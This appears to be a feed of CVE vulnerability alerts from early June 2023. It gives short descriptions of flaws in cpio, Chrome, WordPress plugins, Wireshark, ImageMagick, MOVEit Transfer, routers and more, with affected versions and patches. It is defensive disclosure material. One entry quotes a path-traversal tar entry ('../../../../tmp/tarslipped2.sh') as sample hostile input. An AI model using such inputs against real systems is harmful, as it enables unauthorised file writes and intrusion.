🚨 CVE-2021-38185GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers an out-of-bounds heap write. NOTE: it is unclear whether there are common cases where the pattern file, associated with the -E option, is untrusted data.🎖@cveNotify |
|
| 2023-06-05 01:03:02 |
🚨 CVE-2019-14866In all versions of cpio before 2.13 does not properly validate input files when generating TAR archives. When cpio is used to create TAR archives from paths an attacker can write to, the resulting archive may contain files with permissions the attacker did not have or in paths he did not have access to. Extracting those archives from a high-privilege user without carefully reviewing them may lead to the compromise of the system.🎖@cveNotify |
|
| 2023-06-04 22:00:18 |
🚨 CVE-2013-10028A vulnerability was found in EELV Newsletter Plugin 2.x on WordPress. It has been rated as problematic. Affected by this issue is the function style_newsletter of the file lettreinfo.php. The manipulation of the argument email leads to cross site scripting. The attack may be launched remotely. The name of the patch is 3339b42316c5edf73e56eb209b6a3bb3e868d6ed. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230660.🎖@cveNotify |
|
| 2023-06-04 17:00:21 |
🚨 CVE-2013-10027A vulnerability was found in Blogger Importer Plugin up to 0.5 on WordPress. It has been classified as problematic. Affected is the function start/restart of the file blogger-importer.php. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 0.6 is able to address this issue. The name of the patch is b83fa4f862b0f19a54cfee76060ec9c2e7f7ca70. It is recommended to upgrade the affected component. VDB-230658 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-04 14:59:58 |
🚨 CVE-2015-10111A vulnerability was found in Watu Quiz Plugin up to 2.6.7 on WordPress. It has been rated as critical. This issue affects the function watu_exams of the file controllers/exam.php of the component Exam Handler. The manipulation of the argument quiz leads to sql injection. The attack may be initiated remotely. Upgrading to version 2.6.8 is able to address this issue. The name of the patch is bf42e7cfd819a3e76cf3e1465697e89f4830590c. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230651.🎖@cveNotify |
|
| 2023-06-04 14:00:16 |
🚨 CVE-2022-47015MariaDB Server before 10.3.34 thru 10.9.3 is vulnerable to Denial of Service. It is possible for function spider_db_mbase::print_warnings to dereference a null pointer.🎖@cveNotify |
|
| 2023-06-04 11:00:16 |
🚨 CVE-2023-3094A vulnerability classified as critical has been found in code-projects Agro-School Management System 1.0. Affected is the function doUpdateQuestion of the file btn_functions.php. The manipulation of the argument question_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-230670 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-04 06:00:45 |
🚨 CVE-2023-2933Use after free in PDF in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-04 06:00:44 |
🚨 CVE-2023-2929Out of bounds write in Swiftshader in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-04 06:00:39 |
🚨 CVE-2023-2939Insufficient data validation in Installer in Google Chrome on Windows prior to 114.0.5735.90 allowed a local attacker to perform privilege escalation via crafted symbolic link. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-06-04 06:00:38 |
🚨 CVE-2023-2935Type Confusion in V8 in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-04 06:00:37 |
🚨 CVE-2023-2936Type Confusion in V8 in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-04 06:00:36 |
🚨 CVE-2023-2940Inappropriate implementation in Downloads in Google Chrome prior to 114.0.5735.90 allowed an attacker who convinced a user to install a malicious extension to bypass file access restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-06-04 06:00:31 |
🚨 CVE-2023-2930Use after free in Extensions in Google Chrome prior to 114.0.5735.90 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-04 06:00:30 |
🚨 CVE-2023-2938Inappropriate implementation in Picture In Picture in Google Chrome prior to 114.0.5735.90 allowed a remote attacker who had compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-06-04 06:00:29 |
🚨 CVE-2023-2931Use after free in PDF in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-04 06:00:28 |
🚨 CVE-2023-2934Out of bounds memory access in Mojo in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-06-04 06:00:24 |
🚨 CVE-2023-2937Inappropriate implementation in Picture In Picture in Google Chrome prior to 114.0.5735.90 allowed a remote attacker who had compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-06-04 06:00:23 |
🚨 CVE-2023-32681Requests is a HTTP library. Since Requests 2.3.0, Requests has been leaking Proxy-Authorization headers to destination servers when redirected to an HTTPS endpoint. This is a product of how we use `rebuild_proxies` to reattach the `Proxy-Authorization` header to requests. For HTTP connections sent through the tunnel, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into the tunneled request. This results in Requests forwarding proxy credentials to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate sensitive information. This issue has been patched in version 2.31.0.🎖@cveNotify |
|
| 2023-06-04 06:00:22 |
🚨 CVE-2023-32700LuaTeX before 1.17.0 allows execution of arbitrary shell commands when compiling a TeX file obtained from an untrusted source. This occurs because luatex-core.lua lets the original io.popen be accessed. This also affects TeX Live before 2023 r66984 and MiKTeX before 23.5.🎖@cveNotify |
|
| 2023-06-04 06:00:21 |
🚨 CVE-2023-24329An issue in the urllib.parse component of Python before v3.11 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.🎖@cveNotify |
|
| 2023-06-04 06:00:20 |
🚨 CVE-2023-3091** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Captura up to 8.0.0. It has been declared as critical. This vulnerability affects unknown code in the library CRYPTBASE.dll. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The complexity of an attack is rather high. The exploitation appears to be difficult. The identifier of this vulnerability is VDB-230668. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-06-03 20:58:16 |
🚨 CVE-2023-2952XRA dissector infinite loop in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-06-03 20:58:15 |
🚨 CVE-2023-2856VMS TCPIPtrace file parser crash in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via crafted capture file🎖@cveNotify |
|
| 2023-06-03 20:58:14 |
🚨 CVE-2023-2879GDSDB infinite loop in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-06-03 20:58:13 |
🚨 CVE-2023-2858NetScaler file parser crash in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via crafted capture file🎖@cveNotify |
|
| 2023-06-03 18:58:12 |
🚨 CVE-2021-32862The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer).🎖@cveNotify |
|
| 2023-06-03 14:58:13 |
🚨 CVE-2023-3086Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-06-03 12:58:13 |
🚨 CVE-2023-3085A vulnerability, which was classified as problematic, has been found in X-WRT luci up to 22.10_b202303061504. This issue affects the function run_action of the file modules/luci-base/ucode/dispatcher.uc of the component 404 Error Template Handler. The manipulation of the argument request_path leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 22.10_b202303121313 is able to address this issue. The name of the patch is 24d7da2416b9ab246825c33c213fe939a89b369c. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230663.🎖@cveNotify |
|
| 2023-06-03 10:58:38 |
🚨 CVE-2023-3083Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-06-03 10:58:37 |
🚨 CVE-2023-2298The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'business_id' parameter in versions up to, and including, 4.2.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-03 10:58:36 |
🚨 CVE-2023-2303The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.6.4. This is due to missing nonce validation in the vcita-callback.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-03 10:58:34 |
🚨 CVE-2023-2404The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 2.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-03 10:58:33 |
🚨 CVE-2023-2406The Event Registration Calendar By vcita plugin, versions up to and including 3.9.1, and Online Payments – Get Paid with PayPal, Square & Stripe plugin, for WordPress are vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-03 10:58:32 |
🚨 CVE-2023-2407The Event Registration Calendar By vcita plugin, versions up to and including 3.9.1, and Online Payments – Get Paid with PayPal, Square & Stripe plugin, for WordPress are vulnerable to Cross-Site Request Forgery. This is due to missing nonce validation in the ls_parse_vcita_callback() function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-03 10:58:28 |
🚨 CVE-2023-2415The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_logout_callback function in versions up to, and including, 4.2.10. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to logout a vctia connected account which would cause a denial of service on the appointment scheduler.🎖@cveNotify |
|
| 2023-06-03 10:58:26 |
🚨 CVE-2023-2416The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the vcita_logout_callback function in versions up to, and including, 4.2.10. This makes it possible for unauthenticated to logout a vctia connected account which would cause a denial of service on the appointment scheduler, via a forged request granted they can trick a site user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-03 10:58:25 |
🚨 CVE-2023-2302The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-03 10:58:24 |
🚨 CVE-2023-2299The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized medication of data via the /wp-json/vcita-wordpress/v1/actions/auth REST-API endpoint in versions up to, and including, 4.2.10 due to a missing capability check on the processAction function. This makes it possible for unauthenticated attackers modify the plugin's settings.🎖@cveNotify |
|
| 2023-06-03 10:58:23 |
🚨 CVE-2023-2300The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 4.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-03 10:58:18 |
🚨 CVE-2023-2301The Contact Form Builder by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.9.1. This is due to missing nonce validation on the ls_parse_vcita_callback function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-03 10:58:17 |
🚨 CVE-2023-2405The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.6.2. This is due to missing nonce validation in the vcita-callback.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-03 10:58:16 |
🚨 CVE-2023-34152A vulnerability was found in ImageMagick. This security flaw cause a remote code execution vulnerability in OpenBlob with --enable-pipes configured.🎖@cveNotify |
|
| 2023-06-03 10:58:15 |
🚨 CVE-2023-34151A vulnerability was found in ImageMagick. This security flaw ouccers as an undefined behaviors of casting double to size_t in svg, mvg and other coders (recurring bugs of CVE-2022-32546).🎖@cveNotify |
|
| 2023-06-03 10:58:14 |
🚨 CVE-2023-34153A vulnerability was found in ImageMagick. This security flaw causes a shell command injection vulnerability via video:vsync or video:pixel-format options in VIDEO encoding/decoding.🎖@cveNotify |
|
| 2023-06-03 10:58:13 |
🚨 CVE-2023-0341A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer.🎖@cveNotify |
|
| 2023-06-03 06:58:36 |
🚨 CVE-2023-32315Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice.🎖@cveNotify |
|
| 2023-06-03 06:58:35 |
🚨 CVE-2023-1664A flaw was found in Keycloak. This flaw depends on a non-default configuration "Revalidate Client Certificate" to be enabled and the reverse proxy is not validating the certificate before Keycloak. Using this method an attacker may choose the certificate which will be validated by the server. If this happens and the KC_SPI_TRUSTSTORE_FILE_FILE variable is missing/misconfigured, any trustfile may be accepted with the logging information of "Cannot validate client certificate trust: Truststore not available". This may not impact availability as the attacker would have no access to the server, but consumer applications Integrity or Confidentiality may be impacted considering a possible access to them. Considering the environment is correctly set to use "Revalidate Client Certificate" this flaw is avoidable.🎖@cveNotify |
|
| 2023-06-03 06:58:34 |
🚨 CVE-2023-32325PostHog-js is a library to interface with the PostHog analytics tool. Versions prior to 1.57.2 have the potential for cross-site scripting. Problem has been patched in 1.57.2. Users are advised to upgrade. Users unable to upgrade should ensure that their Content Security Policy is in place.🎖@cveNotify |
|
| 2023-06-03 06:58:31 |
🚨 CVE-2023-32311CloudExplorer Lite is an open source cloud management platform. In CloudExplorer Lite prior to version 1.1.0 users organization/workspace permissions are not properly checked. This allows users to add themselves to any organization. This vulnerability has been fixed in v1.1.0. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-06-03 06:58:30 |
🚨 CVE-2023-21515InstantPlay which included vulnerable script which could execute javascript in Galaxy Store prior to version 4.5.49.8 allows attackers to execute javascript API to install APK from Galaxy Store.🎖@cveNotify |
|
| 2023-06-03 06:58:29 |
🚨 CVE-2023-32317Autolab is a course management service that enables auto-graded programming assignments. A Tar slip vulnerability was found in the MOSS cheat checker functionality of Autolab. To exploit this vulnerability an authenticated attacker with instructor permissions needs to upload a specially crafted Tar file. Both "Base File Tar" and "Additional file archive" can be fed with Tar files that contain paths outside their target directories (e.g., `../../../../tmp/tarslipped2.sh`). When the MOSS cheat checker is started the files inside of the archives are expanded to the attacker-chosen locations. This issue may lead to arbitrary file write within the scope of the running process. This issue has been addressed in version 2.11.0. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-06-03 06:58:25 |
🚨 CVE-2023-32319Nextcloud server is an open source personal cloud implementation. Missing brute-force protection on the WebDAV endpoints via the basic auth header allowed to brute-force user credentials when the provided user name was not an email address. Users from version 24.0.0 onward are affected. This issue has been addressed in releases 24.0.11, 25.0.5 and 26.0.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-06-03 06:58:24 |
🚨 CVE-2023-33143Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-03 06:58:19 |
🚨 CVE-2023-2998Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.14.🎖@cveNotify |
|
| 2023-06-03 06:58:18 |
🚨 CVE-2023-3052The Page Builder by AZEXO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.27.133. This is due to missing or incorrect nonce validation on the 'azh_add_post', 'azh_duplicate_post', 'azh_update_post' and 'azh_remove_post' functions. This makes it possible for unauthenticated attackers to create, modify, and delete a post via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-03 00:58:12 |
🚨 CVE-2023-2816Consul and Consul Enterprise allowed any user with service:write permissions to use Envoy extensions configured via service-defaults to patch remote proxy instances that target the configured service, regardless of whether the user has permission to modify the service(s) corresponding to those modified proxies.🎖@cveNotify |
|
| 2023-06-03 00:58:11 |
🚨 CVE-2023-3044An excessively large PDF page size (found in fuzz testing, unlikely in normal PDF files) can result in a divide-by-zero in Xpdf's text extraction code.This is related to CVE-2022-30524, but the problem here is caused by a very large page size, rather than by a very large character coordinate.🎖@cveNotify |
|
| 2023-06-02 21:58:25 |
🚨 CVE-2023-1981A vulnerability was found in the avahi library. This flaw allows an unprivileged user to make a dbus call, causing the avahi daemon to crash.🎖@cveNotify |
|
| 2023-06-02 21:58:24 |
🚨 CVE-2023-32688parse-server-push-adapter is the official Push Notification adapter for Parse Server. The Parse Server Push Adapter can crash Parse Server due to an invalid push notification payload. This issue has been patched in version 4.1.3.🎖@cveNotify |
|
| 2023-06-02 21:58:23 |
🚨 CVE-2023-33184Nextcloud Mail is a mail app in Nextcloud. A blind SSRF attack allowed to send GET requests to services running in the same web server. It is recommended that the Mail app is update to version 3.02, 2.2.5 or 1.15.3.🎖@cveNotify |
|
| 2023-06-02 21:58:19 |
🚨 CVE-2023-31187Avaya IX Workforce Engagement v15.2.7.1195 - CWE-522: Insufficiently Protected Credentials🎖@cveNotify |
|
| 2023-06-02 21:58:18 |
🚨 CVE-2023-31186Avaya IX Workforce Engagement v15.2.7.1195 - User Enumeration - Observable Response Discrepancy🎖@cveNotify |
|
| 2023-06-02 21:58:17 |
🚨 CVE-2023-32218Avaya IX Workforce Engagement v15.2.7.1195 - CWE-601: URL Redirection to Untrusted Site ('Open Redirect')🎖@cveNotify |
|
| 2023-06-02 21:58:16 |
🚨 CVE-2023-33194Craft is a CMS for creating custom digital experiences on the web.The platform does not filter input and encode output in Quick Post validation error message, which can deliver an XSS payload. Old CVE fixed the XSS in label HTML but didn’t fix it when clicking save. This issue was patched in version 4.4.6.🎖@cveNotify |
|
| 2023-06-02 16:58:53 |
🚨 CVE-2023-20877VMware Aria Operations contains a privilege escalation vulnerability. An authenticated malicious user with ReadOnly privileges can perform code execution leading to privilege escalation.🎖@cveNotify |
|
| 2023-06-02 16:58:52 |
🚨 CVE-2023-20879VMware Aria Operations contains a Local privilege escalation vulnerability. A malicious actor with administrative privileges in the Aria Operations application can gain root access to the underlying operating system.🎖@cveNotify |
|
| 2023-06-02 16:58:51 |
🚨 CVE-2022-39374Synapse is an open-source Matrix homeserver written and maintained by the Matrix.org Foundation. If Synapse and a malicious homeserver are both joined to the same room, the malicious homeserver can trick Synapse into accepting previously rejected events into its view of the current state of that room. This can be exploited in a way that causes all further messages and state changes sent in that room from the vulnerable homeserver to be rejected. This issue has been patched in version 1.68.0🎖@cveNotify |
|
| 2023-06-02 16:58:50 |
🚨 CVE-2023-34225In JetBrains TeamCity before 2023.05 stored XSS in the NuGet feed page was possible🎖@cveNotify |
|
| 2023-06-02 16:58:46 |
🚨 CVE-2023-34226In JetBrains TeamCity before 2023.05 reflected XSS in the Subscriptions page was possible🎖@cveNotify |
|
| 2023-06-02 16:58:45 |
🚨 CVE-2023-31124c-ares is an asynchronous resolver library. When cross-compiling c-ares and using the autotools build system, CARES_RANDOM_FILE will not be set, as seen when cross compiling aarch64 android. This will downgrade to using rand() as a fallback which could allow an attacker to take advantage of the lack of entropy by not using a CSPRNG. This issue was patched in version 1.19.1.🎖@cveNotify |
|
| 2023-06-02 16:58:44 |
🚨 CVE-2023-33476ReadyMedia (MiniDLNA) versions from 1.1.15 up to 1.3.2 is vulnerable to Buffer Overflow. The vulnerability is caused by incorrect validation logic when handling HTTP requests using chunked transport encoding. This results in other code later using attacker-controlled chunk values that exceed the length of the allocated buffer, resulting in out-of-bounds read/write.🎖@cveNotify |
|
| 2023-06-02 16:58:43 |
🚨 CVE-2023-34362In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS.🎖@cveNotify |
|
| 2023-06-02 16:58:39 |
🚨 CVE-2023-3061A vulnerability was found in code-projects Agro-School Management System 1.0 and classified as critical. This issue affects some unknown processing of the file btn_functions.php of the component Attachment Image Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-230567.🎖@cveNotify |
|
| 2023-06-02 16:58:38 |
🚨 CVE-2023-3032Unrestricted Upload of File with Dangerous Type vulnerability in Mobatime web application (Documentary proof upload modules) allows a malicious user to Upload a Web Shell to a Web Server.This issue affects Mobatime web application: through 06.7.22.🎖@cveNotify |
|
| 2023-06-02 16:58:37 |
🚨 CVE-2023-3057A vulnerability was found in YFCMF up to 3.0.4. It has been rated as problematic. This issue affects some unknown processing of the file app/admin/controller/Ajax.php. The manipulation of the argument controllername leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230543.🎖@cveNotify |
|
| 2023-06-02 16:58:33 |
🚨 CVE-2023-3059A vulnerability, which was classified as critical, was found in SourceCodester Online Exam Form Submission 1.0. This affects an unknown part of the file /admin/update_s6.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-230565 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-02 16:58:32 |
🚨 CVE-2023-3033Incorrect Authorization vulnerability in Mobatime web application allows Privilege Escalation, Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mobatime web application: through 06.7.22.🎖@cveNotify |
|
| 2023-06-02 16:58:31 |
🚨 CVE-2023-26930** DISPUTED ** Buffer Overflow vulnerability found in XPDF v.4.04 allows an attacker to cause a Denial of Service via the PDFDoc malloc in the pdftotext.cc function. NOTE: Vendor states “it's an expected abort on out-of-memory error.”🎖@cveNotify |
|
| 2023-06-02 12:58:35 |
🚨 CVE-2022-46308SGUDA U-Lock central lock control service’s user management function has incorrect authorization. A remote attacker with general user privilege can exploit this vulnerability to call privileged APIs to access, modify and delete user information.🎖@cveNotify |
|
| 2023-06-02 12:58:34 |
🚨 CVE-2023-25780It is identified a vulnerability of insufficient authentication in an important specific function of Status PowerBPM. A LAN attacker with normal user privilege can exploit this vulnerability to modify substitute agent to arbitrary users, resulting in serious consequence.🎖@cveNotify |
|
| 2023-06-02 12:58:33 |
🚨 CVE-2023-28698Wade Graphic Design FANTSY has a vulnerability of insufficient authorization check. An unauthenticated remote user can exploit this vulnerability by modifying URL parameters to gain administrator privileges to perform arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-06-02 12:58:32 |
🚨 CVE-2023-28699Wade Graphic Design FANTSY has a vulnerability of insufficient filtering for file type in its file update function. An authenticated remote attacker with general user privilege can exploit this vulnerability to upload a PHP file containing a webshell to perform arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-06-02 12:58:31 |
🚨 CVE-2023-28700OMICARD EDM backend system’s file uploading function does not restrict upload of file with dangerous type. A local area network attacker with administrator privileges can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service.🎖@cveNotify |
|
| 2023-06-02 12:58:30 |
🚨 CVE-2023-28701ELITE TECHNOLOGY CORP. Web Fax has a vulnerability of SQL Injection. An unauthenticated remote attacker can inject SQL commands into the input field of the login page to perform arbitrary system commands, disrupt service or terminate service.🎖@cveNotify |
|
| 2023-06-02 12:58:25 |
🚨 CVE-2023-28702ASUS RT-AC86U does not filter special characters for parameters in specific web URLs. A remote attacker with normal user privileges can exploit this vulnerability to perform command injection attack to execute arbitrary system commands, disrupt system or terminate service.🎖@cveNotify |
|
| 2023-06-02 12:58:24 |
🚨 CVE-2023-28703ASUS RT-AC86U’s specific cgi function has a stack-based buffer overflow vulnerability due to insufficient validation for network packet header length. A remote attacker with administrator privileges can exploit this vulnerability to execute arbitrary system commands, disrupt system or terminate service.🎖@cveNotify |
|
| 2023-06-02 12:58:23 |
🚨 CVE-2023-28704Furbo dog camera has insufficient filtering for special parameter of device log management function. An unauthenticated remote attacker in the Bluetooth network with normal user privileges can exploit this vulnerability to perform command injection attack to execute arbitrary system commands or disrupt service.🎖@cveNotify |
|
| 2023-06-02 12:58:22 |
🚨 CVE-2023-30602Hitron Technologies CODA-5310’s Telnet function transfers sensitive data in plaintext. An unauthenticated remote attacker can exploit this vulnerability to access credentials of normal users and administrator.🎖@cveNotify |
|
| 2023-06-02 12:58:18 |
🚨 CVE-2023-30603Hitron Technologies CODA-5310 Telnet function with the default account and password, and there is no warning or prompt to ask users to change the default password and account. An unauthenticated remote attackers can exploit this vulnerability to obtain the administrator’s privilege, resulting in performing arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-06-02 12:58:17 |
🚨 CVE-2023-30604It is identified a vulnerability of insufficient authentication in the system configuration interface of Hitron Technologies CODA-5310. An unauthorized remote attacker can exploit this vulnerability to access system configuration interface, resulting in performing arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-06-02 12:58:16 |
🚨 CVE-2022-46307SGUDA U-Lock central lock control service’s lock management function has incorrect authorization. A remote attacker with general privilege can exploit this vulnerability to call privileged APIs to acquire information, manipulate or disrupt the functionality of arbitrary electronic locks.🎖@cveNotify |
|
| 2023-06-02 12:58:15 |
🚨 CVE-2022-47617Hitron CODA-5310 has hard-coded encryption/decryption keys in the program code. A remote attacker authenticated as an administrator can decrypt system files using the hard-coded keys for file access, modification, and cause service disruption.🎖@cveNotify |
|
| 2023-06-02 12:00:02 |
🚨 CVE-2023-3000Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Erikoglu Technology ErMon allows Command Line Execution through SQL Injection, Authentication Bypass.This issue affects ErMon: before 230602.🎖@cveNotify |
|
| 2023-06-02 12:00:01 |
🚨 CVE-2023-1159The Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via service titles in versions up to, and including, 21.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrative privileges to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2023-06-02 11:59:57 |
🚨 CVE-2023-2835The WP Directory Kit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'search' parameter in versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-02 11:59:56 |
🚨 CVE-2023-2061Use of Hard-coded Password vulnerability in FTP function on Mitsubishi Electric Corporation MELSEC iQ-R Series EtherNet/IP module RJ71EIP91 and MELSEC iQ-F Series EtherNet/IP module FX5-ENET/IP allows a remote unauthenticated attacker to obtain a hard-coded password and access to the module via FTP.🎖@cveNotify |
|
| 2023-06-02 11:59:55 |
